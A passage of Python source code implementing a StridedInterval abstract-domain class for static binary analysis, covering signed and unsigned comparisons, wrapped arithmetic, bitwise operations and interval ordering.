signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = []\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if lb_1 >= ub_2:\n ret.append(TrueResult())\n elif ub_1 < lb_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def ULT(self, o):\n \"\"\"\n Unsigned less than\n\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n unsigned_bounds_1 = self._unsigned_bounds()\n unsigned_bounds_2 = o._unsigned_bounds()\n\n ret = []\n for lb_1, ub_1 in unsigned_bounds_1:\n for lb_2, ub_2 in unsigned_bounds_2:\n if ub_1 < lb_2:\n ret.append(TrueResult())\n elif lb_1 >= ub_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def ULE(self, o):\n \"\"\"\n Unsigned less than or equal to\n\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n unsigned_bounds_1 = self._unsigned_bounds()\n unsigned_bounds_2 = o._unsigned_bounds()\n\n ret = []\n for lb_1, ub_1 in unsigned_bounds_1:\n for lb_2, ub_2 in unsigned_bounds_2:\n if ub_1 <= lb_2:\n ret.append(TrueResult())\n elif lb_1 > ub_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def UGT(self, o):\n \"\"\"\n Signed greater than\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n unsigned_bounds_1 = self._unsigned_bounds()\n unsigned_bounds_2 = o._unsigned_bounds()\n\n ret = []\n for lb_1, ub_1 in unsigned_bounds_1:\n for lb_2, ub_2 in unsigned_bounds_2:\n if lb_1 > ub_2:\n ret.append(TrueResult())\n elif ub_1 <= lb_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def UGE(self, o):\n \"\"\"\n Unsigned greater than or equal to\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n unsigned_bounds_1 = self._unsigned_bounds()\n unsigned_bounds_2 = o._unsigned_bounds()\n\n ret = []\n for lb_1, ub_1 in unsigned_bounds_1:\n for lb_2, ub_2 in unsigned_bounds_2:\n if lb_1 >= ub_2:\n ret.append(TrueResult())\n elif ub_1 < lb_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def eq(self, o):\n \"\"\"\n Equal\n\n :param o: The ohter operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n if (self.is_integer\n and o.is_integer\n ):\n # Two integers\n if self.lower_bound == o.lower_bound:\n # They are equal\n return TrueResult()\n else:\n # They are not equal\n return FalseResult()\n\n else:\n if self.name == o.name:\n return TrueResult() # They are the same guy\n\n si_intersection = self.intersection(o)\n\n if si_intersection.is_empty:\n return FalseResult()\n\n else:\n return MaybeResult()\n\n #\n # Overriding default operators in Python\n #\n\n def __len__(self):\n '''\n Get the length in bits of this variable.\n :return:\n '''\n return self._bits\n\n def __eq__(self, o):\n return self.eq(o)\n\n def __ne__(self, o):\n return ~(self.eq(o))\n\n def __gt__(self, other):\n \"\"\"\n Unsigned greater than\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n return self.UGT(other)\n\n def __ge__(self, other):\n \"\"\"\n Unsigned greater than or equal to\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n return self.UGE(other)\n\n def __lt__(self, other):\n \"\"\"\n Unsigned less than\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n return self.ULT(other)\n\n def __le__(self, other):\n \"\"\"\n Unsigned less than or equal to\n :param other: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n return self.ULE(other)\n\n def __add__(self, o):\n return self.add(o)\n\n def __sub__(self, o):\n return self.sub(o)\n\n def __mul__(self, o):\n return self.mul(o)\n\n @normalize_types\n def __mod__(self, o):\n # TODO: Make a better approximation\n if self.is_integer and o.is_integer:\n r = self.lower_bound % o.lower_bound\n si = StridedInterval(bits=self.bits, stride=0, lower_bound=r, upper_bound=r)\n return si\n\n else:\n si = StridedInterval(bits=self.bits, stride=1, lower_bound=0, upper_bound=o.upper_bound - 1)\n return si\n\n @normalize_types\n def __div__(self, o):\n \"\"\"\n Unsigned division\n :param o: The divisor\n :return: The quotient (self / o)\n \"\"\"\n\n return self.udiv(o)\n\n def __neg__(self):\n return self.bitwise_not()\n\n def __invert__(self):\n return self.bitwise_not()\n\n @normalize_types\n def __or__(self, other):\n return self.bitwise_or(other)\n\n @normalize_types\n def __and__(self, other):\n return self.bitwise_and(other)\n\n def __rand__(self, other):\n return self.__and__(other)\n\n @normalize_types\n def __xor__(self, other):\n return self.bitwise_xor(other)\n\n def __rxor__(self, other):\n return self.__xor__(other)\n\n def __lshift__(self, other):\n return self.lshift(other)\n\n def __rshift__(self, other):\n return self.rshift(other)\n\n def __repr__(self):\n s = \"\"\n if self.is_empty:\n s = '<%d>[EmptySI]' % (self._bits)\n else:\n lower_bound = self._lower_bound if type(self._lower_bound) == str else '%#x' % self._lower_bound\n upper_bound = self._upper_bound if type(self._upper_bound) == str else '%#x' % self._upper_bound\n s = '<%d>0x%x[%s, %s]%s' % (self._bits, self._stride,\n lower_bound, upper_bound,\n 'R' if self._reversed else '')\n\n if self.uninitialized:\n s += \"(uninit)\"\n\n return s\n\n #\n # Properties\n #\n\n @property\n def name(self):\n return self._name\n\n @property\n def reversed(self):\n return self._reversed\n\n @property\n def size(self):\n logger.warning(\"StridedInterval.size will be deprecated soon. Please use StridedInterval.cardinality instead.\")\n return self.cardinality\n\n @property\n def cardinality(self):\n if self.is_bottom:\n return 0\n elif self.is_integer:\n return 1\n else:\n return (self._modular_sub(self._upper_bound, self._lower_bound, self.bits) + self._stride) / self._stride\n\n @property\n def lower_bound(self):\n return self._lower_bound\n\n @lower_bound.setter\n def lower_bound(self, value):\n self._lower_bound = value\n\n @property\n def upper_bound(self):\n return self._upper_bound\n\n @upper_bound.setter\n def upper_bound(self, value):\n self._upper_bound = value\n\n @property\n def bits(self):\n return self._bits\n\n @property\n def stride(self):\n return self._stride\n\n @stride.setter\n def stride(self, value):\n self._stride = value\n\n @property\n @reversed_processor\n def max(self):\n if not self.is_empty:\n return self.upper_bound\n else:\n # It is empty!\n return None\n\n @property\n @reversed_processor\n def min(self):\n if not self.is_empty:\n return self.lower_bound\n else:\n # It is empty\n return None\n\n @property\n def unique(self):\n return self.min is not None and self.min == self.max\n\n def _min_bits(self):\n v = self._upper_bound\n assert v >= 0\n return StridedInterval.min_bits(v)\n\n @property\n def is_empty(self):\n \"\"\"\n The same as is_bottom\n :return: True/False\n \"\"\"\n return self.is_bottom\n\n @property\n def is_top(self):\n '''\n If this is a TOP value\n :return: True if this is a TOP\n '''\n return (self.stride == 1 and\n self.lower_bound == self._modular_add(self.upper_bound, 1, self.bits)\n )\n\n @property\n def is_bottom(self):\n \"\"\"\n Whether this StridedInterval is a BOTTOM, in other words, describes an empty set of integers\n :return: True/False\n \"\"\"\n return self._is_bottom\n\n @property\n def is_integer(self):\n '''\n If this is an integer, i.e. self.lower_bound == self.upper_bound\n :return: True if this is an integer, False otherwise\n '''\n return self.lower_bound == self.upper_bound\n\n #\n # Modular arithmetic\n #\n\n @staticmethod\n def _modular_add(a, b, bits):\n return (a + b) % (2 ** bits)\n\n @staticmethod\n def _modular_sub(a, b, bits):\n return (a - b) % (2 ** bits)\n\n @staticmethod\n def _modular_mul(a, b, bits):\n return (a * b) % (2 ** bits)\n\n #\n # Helper methods\n #\n\n @staticmethod\n def lcm(a, b):\n \"\"\"\n Get the least common multiple\n :param a: The first operand (integer)\n :param b: The second operand (integer)\n :return: Their LCM\n \"\"\"\n return a * b // fractions.gcd(a, b)\n\n @staticmethod\n def gcd(a, b):\n \"\"\"\n Get the greatest common divisor\n :param a: The first operand (integer)\n :param b: The second operand (integer)\n :return: Their GCD\n \"\"\"\n\n return fractions.gcd(a, b)\n\n @staticmethod\n def highbit(k):\n return 1 << (k - 1)\n\n @staticmethod\n def min_bits(val):\n if val == 0:\n return 1\n elif val < 0:\n return int(math.log(-val, 2) + 1) + 1\n else:\n # Here we assume the maximum val is 64 bits\n # Special case to deal with the floating-point imprecision\n if val > 0xfffffffffffe0000 and val <= 0x10000000000000000:\n return 64\n return int(math.log(val, 2) + 1)\n\n @staticmethod\n def max_int(k):\n # return StridedInterval.highbit(k + 1) - 1\n return StridedInterval.highbit(k + 1) - 1\n\n @staticmethod\n def min_int(k):\n return -StridedInterval.highbit(k)\n\n @staticmethod\n def _ntz(x):\n '''\n Get the position of first non-zero bit\n :param x:\n :return:\n '''\n if x == 0:\n return 0\n y = (~x) & (x - 1) # There is actually a bug in BAP until 0.8\n\n def bits(y):\n n = 0\n while y != 0:\n n += 1\n y >>= 1\n return n\n\n return bits(y)\n\n @staticmethod\n def _to_negative(a, bits):\n return -((1 << bits) - a)\n\n @staticmethod\n def upper(bits, i, stride):\n '''\n\n :return:\n '''\n if stride >= 1:\n offset = i % stride\n max = StridedInterval.max_int(bits) # pylint:disable=redefined-builtin\n max_offset = max % stride\n\n if max_offset >= offset:\n o = max - (max_offset - offset)\n else:\n o = max - ((max_offset + stride) - offset)\n return o\n else:\n return StridedInterval.max_int(bits)\n\n @staticmethod\n def lower(bits, i, stride):\n '''\n\n :return:\n '''\n if stride >= 1:\n offset = i % stride\n min = StridedInterval.min_int(bits) # pylint:disable=redefined-builtin\n min_offset = min % stride\n\n if offset >= min_offset:\n o = min + (offset - min_offset)\n else:\n o = min + ((offset + stride) - min_offset)\n return o\n else:\n return StridedInterval.min_int(bits)\n\n @staticmethod\n def top(bits, name=None, uninitialized=False):\n '''\n Get a TOP StridedInterval\n\n :return:\n '''\n return StridedInterval(name=name,\n bits=bits,\n stride=1,\n lower_bound=0,\n upper_bound=StridedInterval.max_int(bits),\n uninitialized=uninitialized)\n\n @staticmethod\n def empty(bits):\n return StridedInterval(bits=bits, bottom=True)\n\n @staticmethod\n def _wrapped_cardinality(x, y, bits):\n \"\"\"\n Return the cardinality for a set of number (| x, y |) on the wrapped-interval domain\n :param x: The first operand (an integer)\n :param y: The second operand (an integer)\n :return: The cardinality\n \"\"\"\n\n if x == y + 1:\n return 2 ** bits\n\n else:\n return ((y - x) + 1) & (2 ** bits - 1)\n\n @staticmethod\n def _is_msb_zero(v, bits):\n \"\"\"\n Checks if the most significant bit is zero (i.e. is the integer positive under signed arithmetic)\n :param v: The integer to check with\n :param bits: Bits of the integer\n :return: True or False\n \"\"\"\n return (v & (2 ** bits - 1)) & (2 ** (bits - 1)) == 0\n\n @staticmethod\n def _unsigned_to_signed(v, bits):\n \"\"\"\n Convert an unsigned integer to a signed integer\n :param v: The unsigned integer\n :param bits: How many bits this integer should be\n :return: The converted signed integer\n \"\"\"\n if StridedInterval._is_msb_zero(v, bits):\n return v\n else:\n return -(2 ** bits - v)\n\n @staticmethod\n def _wrappedoverflow_add(a, b):\n \"\"\"\n Determines if an overflow happens during the addition of `a` and `b`.\n\n :param a: The first operand (StridedInterval)\n :param b: The other operand (StridedInterval)\n :return: True if overflows, False otherwise\n \"\"\"\n\n if a.is_integer and a.lower_bound == 0:\n # Special case: if `a` or `b` is a zero\n card_self = 0\n else:\n card_self = StridedInterval._wrapped_cardinality(a.lower_bound, a.upper_bound, a.bits)\n\n if b.is_integer and b.lower_bound == 0:\n # Special case: if `a` or `b` is a zero\n card_b = 0\n else:\n card_b = StridedInterval._wrapped_cardinality(b.lower_bound, b.upper_bound, b.bits)\n\n return (card_self + card_b) > StridedInterval.max_int(a.bits)\n\n @staticmethod\n def _wrappedoverflow_sub(a, b):\n \"\"\"\n Determines if an overflow happens during the subtraction of `a` and `b`.\n\n :param a: The first operand (StridedInterval)\n :param b: The other operand (StridedInterval)\n :return: True if overflows, False otherwise\n \"\"\"\n\n return StridedInterval._wrappedoverflow_add(a, b)\n\n @staticmethod\n def _wrapped_unsigned_mul(a, b):\n \"\"\"\n Perform wrapped unsigned multiplication on two StridedIntervals\n :param a: The first operand (StridedInterval)\n :param b: The second operand (StridedInterval)\n :return: The multiplication result\n \"\"\"\n\n bits = max(a.bits, b.bits)\n\n lb = a.lower_bound * b.lower_bound\n ub = a.upper_bound * b.upper_bound\n\n max_ = StridedInterval.max_int(bits)\n if lb > max_ or ub > max_:\n # Overflow occurred\n return StridedInterval.top(bits, uninitialized=False)\n\n else:\n if b.is_integer:\n # Multiplication with an integer, and it does not overflow!\n stride = abs(a.stride * b.lower_bound)\n elif a.is_integer:\n stride = abs(a.lower_bound * b.stride)\n else:\n stride = fractions.gcd(a.stride, b.stride)\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n @staticmethod\n def _wrapped_signed_mul(a, b):\n \"\"\"\n Perform wrapped signed multiplication on two StridedIntervals\n :param a: The first operand (StridedInterval)\n :param b: The second operand (StridedInterval)\n :return: The product\n \"\"\"\n\n bits = max(a.bits, b.bits)\n\n a_lb_positive = StridedInterval._is_msb_zero(a.lower_bound, bits)\n a_ub_positive = StridedInterval._is_msb_zero(a.upper_bound, bits)\n b_lb_positive = StridedInterval._is_msb_zero(b.lower_bound, bits)\n b_ub_positive = StridedInterval._is_msb_zero(b.upper_bound, bits)\n\n if b.is_integer:\n # Multiplication with an integer, and it does not overflow!\n # Note that as long as it overflows, a TOP will be returned and the stride will be simply ignored\n stride = abs(a.stride * b.lower_bound)\n elif a.is_integer:\n stride = abs(a.lower_bound * b.stride)\n else:\n stride = fractions.gcd(a.stride, b.stride)\n\n max_ = StridedInterval.max_int(bits)\n\n if a_lb_positive and a_ub_positive and b_lb_positive and b_ub_positive:\n # [2, 5] * [10, 20] = [20, 100]\n lb = a.lower_bound * b.lower_bound\n ub = a.upper_bound * b.upper_bound\n\n if lb > max_ or ub > max_:\n # overflow\n return StridedInterval.top(bits)\n\n else:\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n elif not a_lb_positive and not a_ub_positive and not b_lb_positive and not b_ub_positive:\n # [-5, -2] * [-20, -10] = [20, 100]\n lb = (\n StridedInterval._unsigned_to_signed(a.upper_bound, bits) *\n StridedInterval._unsigned_to_signed(b.upper_bound, bits)\n )\n ub = (\n StridedInterval._unsigned_to_signed(a.lower_bound, bits) *\n StridedInterval._unsigned_to_signed(b.lower_bound, bits)\n )\n\n if lb > max_ or ub > max_:\n # overflow\n return StridedInterval.top(bits)\n\n else:\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n elif not a_lb_positive and not a_ub_positive and b_lb_positive and b_ub_positive:\n # [-10, -2] * [2, 5] = [-50, -4]\n lb = StridedInterval._unsigned_to_signed(a.lower_bound, bits) * b.upper_bound\n ub = StridedInterval._unsigned_to_signed(a.upper_bound, bits) * b.lower_bound\n\n if lb & (2 ** bits - 1) > max_ or ub & (2 ** bits - 1) > max_:\n # overflow\n return StridedInterval.top(bits)\n\n else:\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n elif a_lb_positive and a_ub_positive and not b_lb_positive and not b_ub_positive:\n # [2, 10] * [-5, -2] = [-50, -4]\n lb = a.upper_bound * StridedInterval._unsigned_to_signed(b.lower_bound, bits)\n ub = a.lower_bound * StridedInterval._unsigned_to_signed(b.upper_bound, bits)\n\n if lb & (2 ** bits - 1) > max_ or ub & (2 ** bits - 1) > max_:\n # overflow\n return StridedInterval.top(bits)\n\n else:\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n else:\n raise Exception('We shouldn\\'t see this case: %s * %s' % (a, b))\n\n @staticmethod\n def _wrapped_unsigned_div(a, b):\n \"\"\"\n Perform wrapped unsigned division on two StridedIntervals.\n\n :param a: The dividend (StridedInterval)\n :param b: The divisor (StridedInterval)\n :return: The quotient\n \"\"\"\n\n bits = max(a.bits, b.bits)\n\n divisor_lb, divisor_ub = b.lower_bound, b.upper_bound\n\n # Make sure divisor_lb and divisor_ub is not 0\n if divisor_lb == 0:\n # Can we increment it?\n if divisor_ub == 0:\n # We can't :-(\n return StridedInterval.empty(bits)\n else:\n divisor_lb += 1\n\n lb = a.lower_bound / divisor_ub\n ub = a.upper_bound / divisor_lb\n\n # TODO: Can we make a more precise estimate of the stride?\n stride = 1\n\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n @staticmethod\n def _wrapped_signed_div(a, b):\n \"\"\"\n Perform wrapped unsigned division on two StridedIntervals.\n\n :param a: The dividend (StridedInterval)\n :param b: The divisor (StridedInterval)\n :return: The quotient\n \"\"\"\n\n bits = max(a.bits, b.bits)\n\n # Make sure the divisor is not 0\n divisor_lb = b.lower_bound\n divisor_ub = b.upper_bound\n if divisor_lb == 0:\n # Try to increment it\n if divisor_ub == 0:\n return StridedInterval.empty(bits)\n else:\n divisor_lb = 1\n\n dividend_positive = StridedInterval._is_msb_zero(a.lower_bound, bits)\n divisor_positive = StridedInterval._is_msb_zero(b.lower_bound, bits)\n\n # TODO: Can we make a more precise estimate of the stride?\n stride = 1\n if dividend_positive and divisor_positive:\n # They are all positive numbers!\n lb = a.lower_bound / divisor_ub\n ub = a.upper_bound / divisor_lb\n\n elif dividend_positive and not divisor_positive:\n # + / -\n lb = a.upper_bound / StridedInterval._unsigned_to_signed(divisor_ub, bits)\n ub = a.lower_bound / StridedInterval._unsigned_to_signed(divisor_lb, bits)\n\n elif not dividend_positive and divisor_positive:\n # - / +\n lb = StridedInterval._unsigned_to_signed(a.lower_bound, bits) / divisor_lb\n ub = StridedInterval._unsigned_to_signed(a.upper_bound, bits) / divisor_ub\n\n else:\n # - / -\n lb = StridedInterval._unsigned_to_signed(a.upper_bound, bits) / \\\n StridedInterval._unsigned_to_signed(b.lower_bound, bits)\n ub = StridedInterval._unsigned_to_signed(a.lower_bound, bits) / \\\n StridedInterval._unsigned_to_signed(b.upper_bound, bits)\n\n return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n @staticmethod\n def _wrapped_bitwise_or(a, b):\n if a.is_empty or b.is_empty:\n logger.error('Bitwise_or on empty strided-intervals.')\n return a.copy()\n\n # Special handling for integers\n # TODO: Is this special handling still necessary?\n if a.is_integer:\n # self is an integer\n t = StridedInterval._ntz(b.stride)\n elif b.is_integer:\n # b is an integer\n t = StridedInterval._ntz(a.stride)\n else:\n t = min(StridedInterval._ntz(a.stride), StridedInterval._ntz(b.stride))\n\n # If a or b is zero, we can make the stride more precise!\n premask = 1 << t\n if a.is_integer and a.lower_bound == 0:\n # a is 0\n # or'ng with zero does not change the stride\n stride_ = b.stride\n elif b.is_integer and b.lower_bound == 0:\n # b is 0\n stride_ = a.stride\n else:\n stride_ = 1 << t\n lowbits = (a.lower_bound | b.lower_bound) & (premask - 1)\n\n # TODO: Make this function looks better\n r_1 = a.lower_bound < 0\n r_2 = a.upper_bound < 0\n r_3 = b.lower_bound < 0\n r_4 = b.upper_bound < 0\n\n if (r_1, r_2, r_3, r_4) == (True, True, True, True):\n lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n ub_ = StridedInterval.max_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n elif (r_1, r_2, r_3, r_4) == (True, True, False, False):\n lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n ub_ = StridedInterval.max_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n elif (r_1, r_2, r_3, r_4) == (False, False, True, True):\n lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n ub_ = StridedInterval.max_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n elif (r_1, r_2, r_3, r_4) == (False, False, False, False):\n lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n ub_ = StridedInterval.max_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n elif (r_1, r_2, r_3, r_4) == (True, True, True, False):\n lb_ = a.lower_bound\n ub_ = 1\n elif (r_1, r_2, r_3, r_4) == (True, False, True, True):\n lb_ = b.lower_bound\n ub_ = 1\n elif (r_1, r_2, r_3, r_4) == (True, False, True, False):\n lb_ = min(a.lower_bound, b.lower_bound)\n ub_ = StridedInterval.max_or(a.bits, 0, a.upper_bound, 0, b.upper_bound)\n elif (r_1, r_2, r_3, r_4) == (True, False, False, False):\n lb_ = StridedInterval.min_or(a.bits, a.lower_bound, 1, b.lower_bound, b.upper_bound)\n ub_ = StridedInterval.max_or(a.bits, 0, a.upper_bound, b.lower_bound, b.upper_bound)\n elif (r_1, r_2, r_3, r_4) == (False, False, True, False):\n lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, 1)\n ub_ = StridedInterval.max_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n else:\n raise ArithmeticError(\"Impossible\")\n\n highmask = ~(premask - 1)\n ret = StridedInterval(bits=a.bits, stride=stride_, lower_bound=(lb_ & highmask) | lowbits,\n upper_bound=(ub_ & highmask) | lowbits)\n ret.normalize()\n\n return ret\n\n @staticmethod\n def _wrapped_bitwise_and(a, b):\n def number_of_ones(n):\n ctr = 0\n while n > 0:\n ctr += 1\n n &= n - 1\n\n return ctr\n\n # If only one bit is set in b, we can make it more precise\n if b.is_integer:\n if b.lower_bound == (1 << (b.bits - 1)):\n # It's testing the sign bit\n stride = 1 << (b.bits - 1)\n if a.lower_bound < 0:\n if a.upper_bound >= 0:\n return StridedInterval(bits=b.bits, stride=stride, lower_bound=0, upper_bound=stride)\n else:\n return StridedInterval(bits=b.bits, stride=0, lower_bound=stride, upper_bound=stride)\n else:\n if a.lower_bound >= stride and a.upper_bound >= stride:\n return StridedInterval(bits=b.bits, stride=0, lower_bound=stride, upper_bound=stride)\n elif a.lower_bound < stride and a.upper_bound >= stride:\n return StridedInterval(bits=b.bits, stride=stride, lower_bound=0, upper_bound=stride)\n else:\n return StridedInterval(bits=b.bits, stride=0, lower_bound=0, upper_bound=0)\n\n elif number_of_ones(b.lower_bound) == 1:\n if a.lower_bound < 0 and a.upper_bound > 0:\n mask = (2 ** a.bits) - 1\n s = a.copy()\n s.lower_bound = a.lower_bound & mask\n if s.lower_bound > s.upper_bound:\n t = s.upper_bound\n s.upper_bound = s.lower_bound\n s.lower_bound = t\n\n else:\n s = a\n\n first_one_pos = StridedInterval._ntz(b.lower_bound)\n\n stride = 2 ** first_one_pos\n if s.lower_bound <= stride and s.upper_bound >= stride:\n return StridedInterval(bits=s.bits, stride=stride, lower_bound=0, upper_bound=stride)\n elif s.upper_bound < stride:\n return StridedInterval(bits=s.bits, stride=0, lower_bound=0, upper_bound=0)\n else:\n return StridedInterval(bits=s.bits, stride=0, lower_bound=stride, upper_bound=stride)\n\n return a.bitwise_not().bitwise_or(b.bitwise_not()).bitwise_not()\n\n #\n # Membership testing and poset ordering\n #\n\n @staticmethod\n def _lex_lte(x, y, bits):\n \"\"\"\n Lexicographical LTE comparison\n\n :param x: The first operand (integer)\n :param y: The second operand (integer)\n :param bits: bit-width of the operands\n :return: True or False\n \"\"\"\n\n return (x & (2 ** bits - 1)) <= (y & (2 ** bits - 1))\n\n @staticmethod\n def _lex_lt(x, y, bits):\n \"\"\"\n Lexicographical LT comparison\n\n :param x: The first operand (integer)\n :param y: The second operand (integer)\n :param bits: bit-width of the operands\n :return: True or False\n \"\"\"\n\n return (x & (2 ** bits - 1)) < (y & (2 ** bits - 1))\n\n def _wrapped_member(self, v):\n \"\"\"\n Test if integer v belongs to StridedInterval a\n\n :param self: A StridedInterval instance\n :param v: An integer\n :return: True or False\n \"\"\"\n\n a = self\n return self._lex_lte(v - a.lower_bound, a.upper_bound - a.lower_bound, a.bits)\n\n def _wrapped_lte(self, b):\n \"\"\"\n Perform a wrapped LTE comparison based on the poset ordering\n\n :param a: The first operand\n :param b: The second operand\n :return: True if a <= b, False otherwise\n \"\"\"\n\n a = self\n if a.is_empty:\n return True\n\n if a.is_top and b.is_top:\n return True\n\n elif a.is_top:\n return False\n\n elif b.is_top:\n return True\n\n if b._wrapped_member(a.lower_bound) and b._wrapped_member(a.upper_bound):\n if ((b.lower_bound == a.lower_bound and b.upper_bound == a.upper_bound)\n or not a._wrapped_member(b.lower_bound) or not a._wrapped_member(b.upper_bound)):\n return True\n return False\n\n #\n # Arithmetic operations\n #\n\n @reversed_processor\n def neg(self):\n \"\"\"\n Unary operation: neg\n\n :return: 0 - self\n \"\"\"\n\n return StridedInterval(bits=self.bits, stride=0, lower_bound=0, upper_bound=0).sub(self)\n\n @normalize_types\n def add(self, b):\n \"\"\"\n Binary operation: add\n\n :param b: The other operand\n :return: self + b\n \"\"\"\n new_bits = max(self.bits, b.bits)\n\n # TODO: Some improvements can be made here regarding the following case\n # TODO: SI<16>0xff[0x0, 0xff] + 3\n # TODO: In current implementation, it overflows, but it doesn't have to\n\n overflow = self._wrappedoverflow_add(self, b)\n if overflow:\n return StridedInterval.top(self.bits)\n\n lb = self._modular_add(self.lower_bound, b.lower_bound, new_bits)\n ub = self._modular_add(self.upper_bound, b.upper_bound, new_bits)\n\n # Is it initialized?\n uninitialized = self.uninitialized or b.uninitialized\n\n # Take the GCD of two operands' strides\n stride = fractions.gcd(self.stride, b.stride)\n\n return StridedInterval(bits=new_bits, stride=stride, lower_bound=lb, upper_bound=ub,\n uninitialized=uninitialized)\n\n @normalize_types\n def sub(self, b):\n \"\"\"\n Binary operation: sub\n\n :param b: The other operand\n :return: self - b\n \"\"\"\n\n new_bits = max(self.bits, b.bits)\n\n overflow = self._wrappedoverflow_sub(self, b)\n if overflow:\n return StridedInterval.top(self.bits)\n\n lb = self._modular_sub(self.lower_bound, b.upper_bound, new_bits)\n ub = self._modular_sub(self.upper_bound, b.lower_bound, new_bits)\n\n # Is it initialized?\n uninitialized = self.uninitialized or b.uninitialized\n\n # Take the GCD of two operands' strides\n stride = fractions.gcd(self.stride, b.stride)\n\n return StridedInterval(bits=new_bits, stride=stride, lower_bound=lb, upper_bound=ub,\n uninitialized=uninitialized)\n @normalize_types\n def mul(self, o):\n \"\"\"\n Binary operation: multiplication\n\n :param o: The other operand\n :return: self * o\n \"\"\"\n\n if self.is_integer and o.is_integer:\n # Two integers!\n a, b = self.lower_bound, o.lower_bound\n ret = StridedInterval(bits=self.bits,\n stride=0,\n lower_bound=a * b,\n upper_bound=a * b\n )\n\n return ret.normalize()\n\n else:\n # All other cases\n\n # Cut from both north pole and south pole\n si1_psplit = self._psplit()\n si2_psplit = o._psplit()\n\n ret = None\n for si1 in si1_psplit:\n for si2 in si2_psplit:\n tmp_unsigned_mul = self._wrapped_unsigned_mul(si1, si2)\n tmp_signed_mul = self._wrapped_signed_mul(si1, si2)\n\n tmp_meet = tmp_unsigned_mul.intersection(tmp_signed_mul)\n\n if ret is None:\n ret = tmp_meet\n else:\n ret = ret.union(tmp_meet)\n\n return ret.normalize()\n\n def sdiv(self, o):\n \"\"\"\n Binary operation: signed division\n\n :param o: The divisor\n :return: (self / o) in signed arithmetic\n \"\"\"\n\n splitted_dividends = self._nsplit()\n splitted_divisors = o._nsplit()\n\n ret = self.empty(self.bits)\n for dividend in splitted_dividends:\n for divisor in splitted_divisors:\n tmp = self._wrapped_signed_div(dividend, divisor)\n ret = ret.union(tmp)\n\n return ret.normalize()\n\n def udiv(self, o):\n \"\"\"\n Binary operation: unsigned division\n\n :param o: The divisor\n :return: (self / o) in unsigned arithmetic\n \"\"\"\n\n splitted_dividends = self._ssplit()\n splitted_divisors = o._ssplit()\n\n ret = self.empty(self.bits)\n for dividend in splitted_dividends:\n for divisor in splitted_divisors:\n tmp = self._wrapped_unsigned_div(dividend, divisor)\n ret = ret.union(tmp)\n\n return ret.normalize()\n\n @reversed_processor\n def bitwise_not(self):\n \"\"\"\n Unary operation: bitwise not\n\n :return: ~self\n \"\"\"\n splitted_si = self._ssplit()\n\n ret = StridedInterval.empty(self.bits)\n\n for si in splitted_si:\n lb = ~si.upper_bound\n ub = ~si.lower_bound\n stride = self.stride\n\n tmp = StridedInterval(bits=self.bits, stride=stride, lower_bound=lb, upper_bound=ub)\n ret = ret.union(tmp)\n\n return ret\n\n @staticmethod\n def min_or(k, a, b, c, d):\n m = StridedInterval.highbit(k)\n ret = 0\n while True:\n if m == 0:\n ret = a | c\n break\n elif (~a & c & m) != 0:\n tmp = (a | m) & -m\n if tmp <= b:\n ret = tmp | c\n break\n elif (a & ~c & m) != 0:\n tmp = (c | m) & 